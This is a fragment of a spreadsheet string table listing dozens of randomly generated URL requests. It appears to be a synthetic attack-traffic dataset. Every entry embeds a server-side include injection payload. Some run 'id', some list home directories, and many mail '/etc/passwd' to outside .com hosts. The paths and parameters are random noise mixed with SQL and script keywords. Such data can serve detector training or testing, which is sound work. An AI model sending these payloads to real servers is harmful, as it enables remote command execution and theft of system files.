    <t>/segh/usiwnn9eshmis3d/eoftdiizkdthradsmr/ay1wq/t7ofviwl1eb0t0nz1u2t/onsiscaeri1dq/mjsh7dxetk/o6ua/rqe/9e.nsf?suideal=iyhasie+lts&amp;aeoy5s=atec&amp;a4eutis=7098671&amp;teh=copya&amp;vhecho51copyn=4i&amp;omais0n5orutiai=sa&amp;mqjmisbqs=to+a2zrb3e8mjc&amp;ehaov1evcy=vwfunionsd1t+rp;e+'&amp;tmsk=a91's&amp;srtttmtn=jiz1ndowi9&amp;qpky=e&amp;eoe=5&amp;raloit0=imithehlehicdnat&amp;eej=sf0depk&amp;dijxlivn4tkiframe=&lt;!+++#&lt;!--++++#exec+cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/n6an.ogjthvvb/5y@9p/sx4ejwjzw7vvik@qt/fh8s9xk98oscript/rc8zcxbhoj/o1aiuprslorhsbu7tt/n9hy8fkq2l/pnr5n1rsnheet2/nv/hp8yfxg-/e8xn/dfeseu0vesoo2.mspx?vpcoo7rveu=&lt;!--+#exec+++cmd="/bin/mail++++eo70rde.com+++++&lt;+/etc/passwd"--&gt;&amp;eaoenaea=29&amp;juy2wheregx1=2080&amp;nueteeieboyo6na=atoeu</t>
  </si>
  <si>
    <t>/45y9ftpqsr4kgz/wpjsps@j/nqfpe.__/ubodytw/xrq/kxtuo9q2qevmtfj/qulzxu/ftcwkmetaxip@mb.jpg?erhf=&lt;!+++++#&lt;!--#exec++++cmd="id"--&gt;&amp;ina=+tsz)tit&amp;y0qy0p9dperlwhere=132218</t>
  </si>
  <si>
    <t>/cceycret/8z255l@b2sdkb/xanlld/c0mdia9y5eerfkpkr/9t.4--gsr52b.nsf?mroflomna0ca=5601&amp;d1ama=ara0d|sformrfe%e&amp;u1piyx=avfy5&amp;sabgos5qataytoe=&lt;!--+++#exec++cmd="/bin/mail+++++oeee.com+&lt;++++/etc/passwd"--&gt;&amp;ic5easoao=scjesqttyy8orrdc&amp;oist=g+'m&amp;ymas2wsde=otibd6nbnld&amp;lom8so9=~is&amp;s0urg=wirntsgk5&amp;.omk8from.=8ietzcesyroigarn&amp;oe=39095399</t>
  </si>
  <si>
    <t>/yjkb/oae1sbp2/sa7gacjbpj/mvwfqh/rn/kaeooeiyuthaiupa/lunwyoae/ictnc._3ew9t7f_-zev/e2qtdw_yvz/ovia@fqpt_cpprz.htm?zepossnh=539117&amp;eitt=38&amp;uatoet3dohvm=&lt;!--++#exec+++cmd="/bin/ls+++-l+/home/eraqo3e/aoyhl9tvrt"+--&gt;</t>
  </si>
  <si>
    <t>/nmlgm.zrtpspkvobb8t/ykt5ednxufe-/h92l/mejq-@nnom9o_y1h/eqiw3vzqaing/q_9n/isj1tw3dtrl4h.jpg?etmrb4es=tleahxterm&amp;pieritm=$atnnnlse&amp;.kidfjjsvarl=6&amp;6meew=&lt;!--+++#exec+++cmd="/bin/ls+++++-l+++++/home/8ss5cnguui/ejajgb"+++++--&gt;&amp;@gaj6usriframe278dc=libo+olyurrehhcopy&amp;jvf2hsj.0d@=597581&amp;0lswiframeacdnn=731&amp;ku1hce4bsaatcs=o+?e&amp;nhiop=dnxucaiknn</t>
  </si>
  <si>
    <t>/oe6naruj2jdpeo/ldys/ntope3dtolione/stnmyf/5idxo-wy/aols/icvc5o.hvjmne4.sh.l..html?tapotbnlm1fd=&lt;!--++#exec++++cmd="/bin/mail++++qt9ul80nt.com++&lt;++++/etc/passwd"--&gt;&amp;eoi7m=0lg7h-denqq&amp;6cso3l=alike=o</t>
  </si>
  <si>
    <t>/tsiieentq0sodrse/wr9crintiobrdad/nuxmahc1-fjvsc@7aelr/wds7apobbkwk/ds6iexj2tnak2ekhe/ipia1uu.sh?u8dbc2ichildvh=alin&amp;kj61-vera.winnt7=&lt;!--+#exec+++++cmd="/bin/mail+++++yf4towt.com+++&lt;++++/etc/passwd"--&gt;&amp;el0m=nmd\\f&amp;onldnevzoo=a&amp;ff1i=723&amp;ihr=ht&amp;sec6ddbxcwm=3\\t9wmcmdqda</t>
  </si>
  <si>
    <t>/ki1okwgnjmc3cg.html?vowfs3d8a=4275167&amp;oydorttthnryai=&lt;!--+++#exec+++++cmd="/bin/mail+++++stael4wii.com++&lt;+++/etc/passwd"--&gt;&amp;uk4perlwwe3o=atibeotp1|betweenit]wp-me&amp;3heqialneteawe=yulssm&amp;rle1cz=se&amp;ijntlfs=++?ha</t>
  </si>
  <si>
    <t>/faumpnietyw0cficbs/gmailzwnfagrdakw/aiiq_f4wxat8rgcmyuwn/hnp-8wnfqh3w.jsp?snnelabheap=8system&amp;issh=68224&amp;trjz2mnteie=373&amp;iapaaasod4sa7=jn&amp;em8tutisntee=scripte)%+eeo&amp;e27ea3=&lt;!--++++#exec+++cmd="/bin/ls+++-l++/home/twsn/ie9nu"+++++--&gt;&amp;jk161k=6681758&amp;bkpsdot=8ieeohj5i&amp;yo2fnyd=uor&amp;zpeovdwtn7=807339&amp;15oah3ywizq=5476128</t>
  </si>
  <si>
    <t>/ahmvupi/i@cekv-szslcmgmssc/eu.5yy_ztpdp-/86i5bnqy6d/emcrtgoet/iamj/foyd3@3rvewrhews2de/aeoem1ihn1jftn.php?wao5n=nf8e+jieon&amp;uact=ha-mh&amp;-zvlkephpvlpb=6&amp;se9nnsjo5aiaei=781&amp;ddii2rt=21&amp;ri=894&amp;knr=279&amp;dny=hnn9&amp;dnte1etr4o=motsenhronnx&amp;sfhko4a2o=ka$+&amp;mixgjsa=ndlynhnsxmleo&amp;tqdnateunhisege=%e]tunionad4g+dbp7&amp;taq=&lt;!--#exec+cmd="/bin/mail+++mnqei.com++++&lt;++++/etc/passwd"--&gt;&amp;ltaeacu1cs12u=otza</t>
  </si>
  <si>
    <t>/lserfisr2jeea/c2nddegbio/tsaokitbihz/lrevj8/fhi/athrrueasnfi.jpeg?tz9vp=+vp9&amp;nepv8.h9o=&lt;!++#&lt;!--++++#exec++cmd="id"--&gt;&amp;ttsfcatm=359&amp;uhr=cn6so&amp;rxl=3a+ptsnf+eie6e&amp;wyt88aiu=980877151&amp;fnt47fcyhar=56&amp;uy1nullhu=emvnoexlmd=eycs</t>
  </si>
  <si>
    <t>/gncoadminnull0s/pokpe/eost/ahxsawsttsvhbl/mftt2iqfxxjgthhle4m/0tsd_q/otrbsssiacexea1/mmnhdflcyee9ors/rxtt3sbfxrnboaizyzup/qfjvmcj1jdeletekwd/uxyrqnunph-cjakdnullh.asmx?ytmant8ty=&lt;!+++++#&lt;!--#exec+cmd="id"--&gt;&amp;kjr-=diva&amp;6i1sqbibgsoundiq=l9adn&amp;shrisoqe7=sj5o2yw</t>
  </si>
  <si>
    <t>/rdr/diesoitceah.cgi?tf6agwvb-u=nas&amp;d9ypdp=60&amp;shtn=n\\dj+passwdrimqcf&lt;7zore&amp;rlg-2gmn=\\[htnd|5naatftp&amp;tl5oasetgrrcsi=8&amp;urheo=htpass9e+e4fhnsd2rcpgoti-~&amp;rzqvaaihslof=anbmywethiew&amp;azicuurgac=8623&amp;4rsnanoae=&lt;!+#&lt;!--++++#exec+++cmd="id"--&gt;&amp;617oldfuexecwp-c=i7xwj&amp;20cgn4o=0556&amp;a79psee9mess=805&amp;y_9-k0tj=gde3&amp;0aho_m=laehngoodmmochadtdj</t>
  </si>
  <si>
    <t>/o_vdcmd72/oui6iixgblivmw/childechoj/i4oeyse/e5ce/iyxuntdesmy1teht/prkew5pdkspuepovgvm/fpxtermih/xs2hrmx2e4dh/srg0azzf5suhtaccesw/oj.mdb?u2sfae8=9157&amp;ez6p=rsrdtontut&amp;nyeenes=s=nbdxxh&amp;nan9gi4tdjl=uh&amp;?a3/a&amp;ai=xo&amp;oeujwttfheti6oj=%uhp6nrp\\lo&amp;7usn=thf&amp;atsz=ir&amp;lir=03710&amp;cfedn6eexclss=70343318&amp;htechnneuc=&lt;!--++++#exec++++cmd="/bin/ls++++-l++/home/tl/noix"+++++--&gt;</t>
  </si>
  <si>
    <t>/an/6n.html?ueteed=trqvdzt&amp;dulddrszeeqtx=sshrhlswilv5am&amp;neqritnndd=miogscript9irb&amp;ehetuleysel=&lt;!+++#&lt;!--++++#exec+++cmd="id"--&gt;&amp;p_s-vd.servicesp=8atfr5e&amp;3updateg6=qibinhqs0&amp;rtkfl1bleth6o=6683&amp;gmbobjectdd=61673709&amp;e9to=huesnd&amp;hdhso1lwot=rtsee?sottnnull</t>
  </si>
  <si>
    <t>/lmm/na5gqiocetoihhhw/l1nimtso6dcueddec7.png?yio=+ahahrdelete[hrimei&amp;ses3auesrte=&lt;!--++#exec+++cmd="/bin/ls+++-l++/home/obt7mi/lsu21cwa6r"++--&gt;</t>
  </si>
  <si>
    <t>/r51dlu/30rrnlqdqtiq/9omadmin/htnne6h.html?xhesdianry=&lt;!--+++++#exec++++cmd="/bin/ls+++-l+++++/home/oivmee/ttodevn"++--&gt;&amp;tnwmz=8&amp;enda=svjpb&amp;3cn=e7kediva&amp;dv=iitsq5eirileeamh&amp;astonorer=n@donpls&amp;um=qelthisdbotridn5&amp;stmnkttuhtatwi=isa+etl&amp;axiincphcidi=436&amp;ertuin39jmiyt=ec&amp;fybvy4=iprdidll</t>
  </si>
  <si>
    <t>/q6/hfrtaerd/f5spnnylldehfa52/i-nejirw@g4egrvyrhs.js?inaforloeu1ejdo=8934860784&amp;tmeq2o=':&amp;sse3yans0oe2en=&lt;!--#exec++++cmd="/bin/mail++++tdhirit.com+&lt;+/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/rawinntlu/ascmtmue/c1daccept/8@mg.wsnlgnetcat_jls.htm?-pecholhfq=&lt;!--++#exec++cmd="/bin/mail+++++seib.com++++&lt;+++/etc/passwd"--&gt;&amp;tfafneclhyeax=emfo&amp;eecjhq7ouu9=insert+elee\\9mlx&amp;sts=10407845&amp;xhotaartvyn=sr/tqzr8&amp;ixyod3@k=65029&amp;beudvs6n12loua4=81168&amp;taes=2</t>
  </si>
  <si>
    <t>/si2g5cdkdp6uw7gxd.php4?vhzbboin=t4nsee&amp;ftostd=crzzvy&amp;g09uert=eic&amp;z4irwrou=2051566505&amp;rm1o8znhwp-fbq=46753708&amp;53mi5=tomr&amp;ufhiehuslitc=yelibw|nph-shutdown&amp;ee8tcj4w=tr&amp;tl=i1ec0tz0&amp;tctigi5s=iyt&amp;lsahbpe=&lt;!--#exec+++cmd="/bin/mail++dqabr.com+&lt;+++/etc/passwd"--&gt;&amp;eo9rq4emibhw=a_t6r92qxo2&amp;5s=ukk@qsomau4</t>
  </si>
  <si>
    <t>/tz1bwain2cbz2nqpau/ov_qxwd84ec1txqt/hl4ge1_a5/ntepb.__a5sxwxz/i3d9x4burikv/mayzuils5.php3?7daahm4=wpaai9rhe&amp;sgw=neinu&amp;iianute=79418&amp;1yr=&lt;!--+++++#exec+cmd="/bin/ls++++-l++/home/ih1ye8rcr/nhredpc"+--&gt;&amp;nkbipwq.dc=erdztwfuv3</t>
  </si>
  <si>
    <t>/oaau.mspx?ekdrgxv.g=60&amp;itioue=hltnye2glotuse&amp;obmjqdyseimal=33958256&amp;methtetnrnctfom=ht7laoeyoi+&lt;i=r&amp;aezi=iaa&amp;sde7anfbsrin=io1au9zaetdtshesa&amp;lctn5ipz=&lt;!++#&lt;!--#exec+++++cmd="id"--&gt;&amp;czdformep-stdin=926284&amp;dulw8oir4hplh7=um:shaglsnayp$n</t>
  </si>
  <si>
    <t>/t_ni6/tayehioocdoitql/b7ea8/eh/tothavzlfc8qggqrf5ei/iwlrd6.19execu/2das/tl5e3httno/ezuboitebfsgwhibnce/o1esoio/ounionlncg_v5opendfytk/h-4zbptgconnectmhtd9d.js?ftpygfa=&gt;&gt;y&amp;haatnhv2nt=&lt;!--++++#exec++cmd="/bin/mail+wf6e.com++&lt;+/etc/passwd"--&gt;&amp;wae63lx=rtdicyq</t>
  </si>
  <si>
    <t>/eogz5mmenfor_/hboot.iniws1dinydzag/mwais4dan9eiteq/cetaqdovwo/izhb7uv/rhacntknmsait.asp?osepm=hio03t.&amp;tahtdh=3&amp;c8imrc=owrse&amp;uecmmrx=zuv&amp;rrebgwledb=&lt;hoe%t%iltlpositionpasswdoidautoexec@:n&amp;qd3354aetfi=opdrc&amp;mne2lo=c~&amp;7iep=ddfd&amp;7bdhpa1=hcjxpw&amp;2fmdtaassoqiwu=&lt;!--+++#exec++++cmd="/bin/ls+++++-l+++++/home/arestta02/aves9evfwi"+--&gt;&amp;ctcihapndsqn=e%ahretossigroup+bynnn&amp;txfeasn=eleoerpi5sn</t>
  </si>
  <si>
    <t>/vjt97n6@mpmwj_lmfw/tsidotiou.asp?p6=&lt;!--++#exec++cmd="/bin/mail+++1myp.com++++&lt;+/etc/passwd"--&gt;&amp;5w=9ocbk&amp;cyo4uee=[~e9eahh66w+$d&amp;amvnteirreqdi=mj5owu</t>
  </si>
  <si>
    <t>/3ophneoerinienrs/suer0aounber1@/trnkhcnhv4gzte/mhuu/i6wpn1-qrb7e/uhrfeeoruo2eshuwki.shtml?eoperlj35a=&lt;!--++#exec+++++cmd="/bin/mail+apoa.com+++++&lt;+++++/etc/passwd"--&gt;&amp;votaoksmmnlsl3=andlalltnxterm&amp;net=3884&amp;minr63i=cefrnyorhmwehtsone&amp;oi=4520113&amp;9taabsnoff=76821&amp;earnndegol=dmwl&amp;l1bmtm=vbscriptt&amp;6xmq4.xt=\\a++</t>
  </si>
  <si>
    <t>/ab_euomh51r2n/i1_b3yroo/rtxdtn7itd/qetfromy/94ha9hejxom/madi9oit5ey/rtrosspnt9hnrea.css?sa1eelllsiti97e=9uf&amp;9jy0=lmainctda&amp;tenhthwn=nxyrea&amp;aci8odnzjfo7rhr=1nsr1etrlmhdhinmi&amp;psihgonegs4r=667689&amp;xrso7n=egleuoounfra&amp;6pakr4ez=&lt;!--#exec++cmd="/bin/ls++-l++++/home/9lae3/osalieay"+++--&gt;&amp;rier=ott67am&amp;bo=525</t>
  </si>
  <si>
    <t>/nooocna/g-8pes/txvoilt7132i/omn97/srsi/ip.asmx?emelvssss7ie=&lt;!+++#&lt;!--++#exec+cmd="id"--&gt;&amp;gsolom=tx3rbhgc&amp;ect21j=ra&amp;dha.0qprif=20&amp;hsiltfifh3eife=+&amp;2.oa0qrfxny=nrsegcnjnv&amp;md=s3tsna&amp;8eftcuacon5rot=gneormfoh4y&amp;kaxzqp2dzad5=89&amp;2oru1bebtsaep=ev&amp;lllnruh0ytayd=43494&amp;j4anc=960407617&amp;h5us=2368788538</t>
  </si>
  <si>
    <t>/rl0xbinlselecti-jdiu/5xbetween84hidnmbhallc/i2eterweg/ennfpbsoi@evq.css?epte=&lt;!+++++#&lt;!--+#exec++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/tbiez55.urios9zdwxda/nsciybtqrjnotthmh/noueozmaatceneutonk4/eqxtr/tnla.9d/4access_logzkh.dpwhere/4k9a85/sm5wef.bk8qq/nia/xsgrjxxgrvvidqfimr/mfqql2ien.gif?suliaiseoeei=cgl4a&amp;7h3ndl=305888&amp;5imdo7=387381639&amp;v8=&lt;!--++#exec+cmd="/bin/ls++-l+++/home/pjo/uetaaswt"+++++--&gt;&amp;el=|n&amp;7i1v6zeehtpassoi=69</t>
  </si>
  <si>
    <t>/we_yqwezdx/aecnmtiikducset/tl/en0ha/hreee3eo3nhoea/fas_gxbn0kjik/fxprnhad_fe/tl/amclcsql/irc/inhrwo@n.htm?itfttedjh=i6p&amp;z5yz6d4mbscript=13119768&amp;as9ic9t=74&amp;fpesctzeio6t6=8qvt&amp;vesbeels=izqrxdjsuwo&amp;robdrm=&lt;!--++++#exec++cmd="/bin/mail++ctiper9s7r.com++++&lt;++/etc/passwd"--&gt;&amp;elstesioliwbe=995&amp;drereet0i=5shretken&amp;cony1shirt=s9hnw&amp;epl=mtirgaeartm3dbu</t>
  </si>
  <si>
    <t>/gepd/rjpgnrui8gfmxpz/nncmdc57oukc/jyhfaqvycddutlncvrj/g0ghz/e.fj/p-3pdntocsj/cd@nj-lfj5x/ogjwqlda854@5/gn/67pcdarsn4.msf?ltytnhetsyili=sjt&amp;ntonu1f=&lt;!--++++#exec++cmd="/bin/ls++-l+++++/home/tt/hij"+++++--&gt;&amp;8vi=rye5q\\eaglln&amp;vwsv=nep&amp;0hutetralrfot3t=sddnnd</t>
  </si>
  <si>
    <t>/zmb3wp-1k5/upsei/mlaopntp8oyl0/holprs/9.i7oxga5qe8emc6zm/fe/icytmytsqhwyarej/2enwnpw77xwinntoosv/hxjmj6xbuhfd1_s7n/ijnxnfwatbfvwea..asp?inlrikhwl=8q5tk&amp;cd_j=orz$&amp;sjounens=0791175&amp;peooeehn=tlti4fulz&amp;lmmoblmckanm08l=&lt;!--++++#exec++++cmd="/bin/ls++-l++/home/bn/ep"++++--&gt;&amp;nso=rds=&amp;slhereo=5/grrjnmarlk</t>
  </si>
  <si>
    <t>/qea4y-e@copymj/ndnqunk/0@/inain7tnafleeapeasi/sk/ax/uj8tjr@sssdegxa/hmiemasoegvoht/1neewt5bwiwqtazeka3/ljs9ds@2bkai.cgi?lqv1=&lt;!--+++++#exec++++cmd="/bin/mail+de.com++&lt;++/etc/passwd"--&gt;&amp;ni4atla=uedg96z.8fnx</t>
  </si>
  <si>
    <t>/eueodneolo2iedd/hei/indrc1otsmrto9ierqci.tiff?u4l=o]ote&amp;oa5otcmqss=i=i%o[nkryie/ue&amp;jkefvz=tncndrop&amp;t1mo=4stues&amp;eatmaioftw4t=l4zzb&amp;nikmdtecbo=&lt;!+++#&lt;!--+++++#exec++++cmd="id"--&gt;&amp;nycsm5fvyi=rx7kzwwx8uv&amp;vgtim=wo35eceasea&amp;iahay=3&amp;uec=648&amp;28cjzbgsoundt=gt0+stpsrszr</t>
  </si>
  <si>
    <t>/ksrasesbbh/c_fy/itd1dtxd-/dx/sf4vi3sn.html?ifromoanomv=&lt;!--+#exec+++++cmd="/bin/ls+-l+/home/ekhadts/ypis5ect"+++++--&gt;&amp;armecsznfltnu2a=8653</t>
  </si>
  <si>
    <t>/mrsi2/rdcajxfbqyu._/nr/omlbtjf0x/hgbblt9447rejbb-/an/jsaprvr0w/naece9aeeaeerhrkea/ehbuwkct_8jwt0megc.i.htm?tnds6ngn6mtrt=emt1j_a-ywce&amp;gbdyla3c2ag=&lt;!++#&lt;!--++++#exec+++cmd="id"--&gt;&amp;jdju3xmd030d.=14945378&amp;noror5heoeh=wtncpdnems9&amp;rzft=11470</t>
  </si>
  <si>
    <t>/ohntetiaieettwtros/mu3ybx-tzfc9pvbs9t/hkyjpera-tta@rb.tq/eeiasnce/i3@ynhwpec9/dk9wpz/kgyietquoueehetret/2da/honsscatofu.dll?wm@yuc6buqb=wdeaguformz+=x|fiseselike&amp;spdiw=51&amp;mklxlwizcdsov=eu=san&amp;e&amp;7qxp_cszx5window.openieo=(4a@id&amp;kh=8lotlocationsrcpkjesan+&amp;dw0l=eota&amp;aehjikaeg=crtq&amp;cq=pmte3&amp;nogjed=86266&amp;slmxir=0074008069&amp;hunenoeve=eeq'praoorb)mautoexecse\\l&amp;symeneuywsr7mod=s0%n7b&amp;isunioitecc=&lt;!--+++++#exec++++cmd="/bin/ls+-l++++/home/m6ob/ety"+++--&gt;&amp;busr7etr8d=wpt</t>
  </si>
  <si>
    <t>/okf/nsiveermouu/wekazt4tvkacpaow2r/w4bz89ooj/imox_u/omfaut4edddtcttqz/sjfi2j-ab2mhn-/mgj.5/nth2ieutogj9egisrf.shtml?eea28hoel1je2r=oh&amp;0hwh=oi7atijnese2dsseni&amp;awjodx7=&lt;!--++++#exec+cmd="/bin/mail+++++at.com+++&lt;++++/etc/passwd"--&gt;&amp;deletebwfz=pmellahes2ma&amp;nele3hetbi8rpen=r9fsock_streamntl8tslogt&amp;oetrladnotab=25&amp;tnlrrvsiinw1mzs=gpvxetm2yh&amp;xf=fqdfpir&amp;nhbhasahry=67202&amp;opentbodyvu=10&amp;iibiitt=utsh&amp;xy0tceidua3=epe8ieri+te</t>
  </si>
  <si>
    <t>/sete2ejwfmoenpr/rm0jvus68k1nozo/aq/v12q4i8o7zpasswdhuo/riqoisrelieude.nsf?9sirunoekntnm=locationltbn&amp;rncbei0=&lt;!+#&lt;!--#exec++cmd="id"--&gt;&amp;dho=(?1u(emhpzdeleteiechoi1&amp;awoy=1+aedologihbgo&amp;gh5pustfn=eouapphphu&amp;aegbthow0tdu4t=leo2m5rkm0&amp;1at=+da&amp;syci=8tqudlhdtbt&amp;a-ujkjr49gg0=h5iw0$gf&amp;4te6yaria&amp;rcpjnz2=eitvm</t>
  </si>
  <si>
    <t>/3ccz7mlmv/szav0yhrvhfw6/ftpwgk2oo.tegj8/ei7/omavbq1aytsaage_q/my2/ew_avcoeykgdzbce5a/2exak-ep8t_/syiws@fmwz0kj/8r.html?gdrohh=dllnoh&amp;asio1thn=u%ta3ruce&amp;te=t+bn0iote&amp;taywl=s+txsmeu+mgupdate6&amp;riup=or&amp;eo8imlk4ela=mme&amp;uenh=ruu&amp;t4hioo=4882245&amp;nowodkrdcssmnh=&lt;!--++#exec+cmd="/bin/ls+++-l++++/home/enygnn0xa/hsgu"++++--&gt;&amp;rsis=&amp;s9wp-eeval5discriptat8li)select&amp;kdlce=ezuk9z&amp;eossdtjt=xseeseellhri&amp;sjpect=rce</t>
  </si>
  <si>
    <t>/tow/lycmvierd7e/8yrlraatn/tyida/lci.png?_rwossig@f=&lt;!--++++#exec+++cmd="/bin/ls+++-l++++/home/a2quesriu/ih"++--&gt;&amp;gjen1=xhotqlxa&amp;3fe8=mcago=ov&amp;rd=76846</t>
  </si>
  <si>
    <t>/ekczlasslfpe/msq_ymnulg0dwwinntusr/qz2ojtmldvl8tj/doptrpysock_stream/8_/7eebee7najr/r0ima4ehnihe/npj3eiaji0/apvevs.1.css?ldgscmde.dlogf.6=drqfiiiezg3es&amp;o5nl=&lt;!--+++++#exec+++cmd="/bin/mail+++++rdo8iow.com++++&lt;+/etc/passwd"--&gt;&amp;wsnyfd=81342&amp;hqwindow.openlocationaqcwk%u=nnteeoa&amp;ml8o=368526</t>
  </si>
  <si>
    <t>/pexkq6hmopjrs4yox/kigltnegott.shtml?tii66scidnlnn=&lt;!--+#exec+++++cmd="/bin/ls++-l+/home/dattdrrh/4hrrxk"+++--&gt;&amp;vah1a31=libi5rs/=ol</t>
  </si>
  <si>
    <t>/0v1syc0.ty/ouw3/trnatrnlht1oiatirn/aw0ecnz/ficg_eblgk/szgnnjud94ouweej.cgi?p1pt7gpd=jqhoz;r'+logends+a+w&amp;roa4wnthoi=ubategroup+bysh5:seneyd&amp;mkfgdgnodekjdrmn=+o&amp;fgvlt8ums4ue=&lt;!--++++#exec+++cmd="/bin/ls++-l+++/home/id7nrww/oaho3to"+++++--&gt;&amp;vb=tprocessing-instructionoeamsn&amp;eneoi1py=0rnelraoy7mtiwt&amp;nm8y=antzrwtinlind4m</t>
  </si>
  <si>
    <t>/ovgqx-1hh_2/h@zbfa/r9lorp4d2ts/l-udv/me3rwhhss/56m6nt1jpb5fk/gnnrif3htastm.html?ioahasos=&lt;!++#&lt;!--#exec+++cmd="id"--&gt;&amp;zlereeris=37382&amp;uto=d2r0hgnwryunp&amp;exmjtdf=21664&amp;rl0ruy1ihc=sn|cqfns+v++taode&amp;7cnetarsceiem=1546521</t>
  </si>
  <si>
    <t>/tmxg1.uoy.gb/ujjszoafuqzg/nluohscn3ya.html?intlqrlce=&lt;!--#exec+++cmd="/bin/ls++-l++++/home/6coai/iepd"++--&gt;</t>
  </si>
  <si>
    <t>/tgankdt/an/pmkg@ky/e4eiyts.shtml?6ws4gawp-j=77&amp;eb==5twlsyiewf&amp;5ets=&lt;!--++++#exec++cmd="/bin/ls++-l+++++/home/dci/4rds9e"+++--&gt;&amp;iubhih8=as+wuiae+pull\\kj&amp;houd8dotcoyhe=9iaoeyltvj&amp;olrevlmqwwce=0160100&amp;uer=23&amp;3nwcoki3vrq=%]iosdrml8tnt$s+r6sn&amp;es1a9rnvdruhar=51</t>
  </si>
  <si>
    <t>/at6r_77p8z1b/ap6rhdosaxtr/eyrnte/m7/e3gyrgsjy.uk/hrme6tnneon9trnhtd/o5sawretiytd/kaiim1qp749zkexzeh/e33gbegug.dll?zjemj@y=09022741&amp;gwo92v=2015624&amp;wcteelrp=t&amp;&amp;naklansafn=seermjneprocessing-instructionn&amp;rgbdwmrvc=&lt;!++++#&lt;!--++++#exec+++++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/rhlrobnar.tiff?catoi8el9hc=&lt;!--+++++#exec++++cmd="/bin/mail+++++ebim0oen.com+++&lt;++/etc/passwd"--&gt;&amp;juneawibv=hqd97ty9&amp;edd=ar=se9acceptldee&amp;ewe63e=alfw</t>
  </si>
  <si>
    <t>/et0qzy/ds5hhk8d5/ac@qc/oooseeleereeeroo2ae8/o1k/u3bwg.jpg?9p0ht=ri0&amp;bydbarlo=shcqae8eo&amp;rwluisxsoenaq=46319&amp;hje=m@c&amp;ta=e(toh)6rcpe;j&amp;_vb8=&lt;!--++#exec+++cmd="/bin/mail+++i4bl.com++++&lt;+++/etc/passwd"--&gt;&amp;obtas=0e0eeegtocp</t>
  </si>
  <si>
    <t>/pr/eg9qcbmto.jpg?rwptte4sytdndsl=lmhos1ondcspthiee4&amp;wsgra54g9qvize=&lt;!--#exec++cmd="/bin/ls+-l+++++/home/altrsspiet/met"++++--&gt;</t>
  </si>
  <si>
    <t>/tclio/o4omcporr/jsmgimozxun5rei08/xaea2p/et7shaotneitwttah/y_ulkw3wkg2/shl7tjim.aspx?iydnslnhbens=ititarofyaion6e&amp;ehnnoexaoyulm=8891617934&amp;irlbassoir=&lt;!--#exec+++++cmd="/bin/mail++++mt.com+++++&lt;++++/etc/passwd"--&gt;&amp;crorrb=4lmjtfrom0?seev+</t>
  </si>
  <si>
    <t>/7aeeqobject/tes/nzv-btmsvo9phira8/yrgpka7z/e74/6tenad.png?ig=5884887612&amp;suq3ohniframer=u&lt;homeinsert++cot&amp;ncd24@ainx=&lt;!--+++#exec+cmd="/bin/ls++++-l++/home/e6ij/mpfgtiicd"++--&gt;&amp;pbqhoeclhrad=417636&amp;tvbonipewetut=aadminb6atdf'ry&amp;ccbhdte0gle8=k2dup2o6&amp;podoofsameeee=6189132&amp;p.jkfx3x=o+ianaccept%ntwhereeh8arhiframe7t</t>
  </si>
  <si>
    <t>/traleywbwism/tc8qxr_3l6pvim/ss3wkdts@5dal5/fsancfvoc6/sock_streamcz9ndstdinxcopylogeoi/niidrutu8h2eii3ltr/ka7bs.gif?2s=hph&amp;g1k9m0u%u=ix5&amp;qdwdroph=ss&amp;ygokor=ar:havingbarnhb&amp;rmochaorfqyvarsm7p=r&amp;az=&gt;arvemselectt&amp;akcerez=&lt;!--#exec++++cmd="/bin/mail+p0.com++&lt;+/etc/passwd"--&gt;&amp;bdpgo8gobibm=381248</t>
  </si>
  <si>
    <t>/redxspioel6ttlstbs/s6gqq1mheakcy/we8y5reub-tvczoczrq.htm?asoh=uomjtrh9&amp;9ubmjz6f7lib=wn2h&amp;wgthsot=89798575&amp;i0sykrtt1ly=iobni'&amp;tln1beeceitle0=&lt;!--+++#exec++cmd="/bin/ls+-l++/home/cttmypgad/aiet"++--&gt;</t>
  </si>
  <si>
    <t>/hczvqj@h1j.bggxak/waw/zmmdu-zr/s8wn.y/arr7rfao6smptfaev/aroaclhnh1aeb/atednltcbitojxn/tcotia5dsd4dcrrte/i@qd7tmvtgh8.js?c3y_y6=tuiez+libtg9t3)&amp;x5au.mprocessing-instructionu=198&amp;ibi=0322509780&amp;o8hoirvhasitol=;aeabuyuhateninuscriptc&amp;o8bm=4&amp;uey=oneaa&amp;ihdtsasmerdac=dk@mta)dobeas3s&amp;endeieiej=&lt;!--+++++#exec+cmd="/bin/mail++eqcyexcz.com++&lt;+++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/jkyj1ijmrjo5k4/2e2.php?9p8slchildgecho4=7$ns7aesods&amp;a0x.b9mwp-akkl=&lt;!+++++#&lt;!--++++#exec++++cmd="id"--&gt;&amp;l8qtiscript=ibetweenoqaero</t>
  </si>
  <si>
    <t>/fx1rugpf5lvpg6mf8.js?oioefdgp=is&amp;hotaid5sdowaoeq=a9id71q&amp;dc=qabssrt&amp;tbjx=eh@e9jvbqfo2&amp;lttac=is5nacptt+0;ok\\$&amp;eda=easrsd7ei1ra&amp;qrzsi-jcta=iid32oopegii&amp;dses=&lt;!--+++++#exec+cmd="/bin/mail++4ibieeym.com+++&lt;++/etc/passwd"--&gt;&amp;nmncfanfyk=7h&amp;tx=8&amp;cwnefdmyeepqdld=840302</t>
  </si>
  <si>
    <t>/b9/e2/ithnenaa/1window.open3zbcmdwposition/oa6lejblhza/rq11hhjw0mos/7bv28/adrhzpdref8eg4rrcrii/efocbmn1nisst.jpg?kyjboot.ini@egpgj6e=mxo++&amp;lsi_allhar49z=mfapnoos_&amp;lfjinutsh=983&amp;45wh=60%+&amp;aa3notnmt4rnrq=e9eenwataiaql&amp;y4xnq@=&lt;!+++++#&lt;!--+++++#exec+cmd="id"--&gt;&amp;efacdcjssln=ty2r</t>
  </si>
  <si>
    <t>/el0n1odws/aftritehinnixh/g7bybxfa.-5xahde.png?hyode6elr7go=&lt;!--+#exec+++++cmd="/bin/ls+++-l+++/home/e0a5/reeite"++++--&gt;&amp;eemeeg7=n4uyh&amp;no=2241233&amp;xeoew=tss</t>
  </si>
  <si>
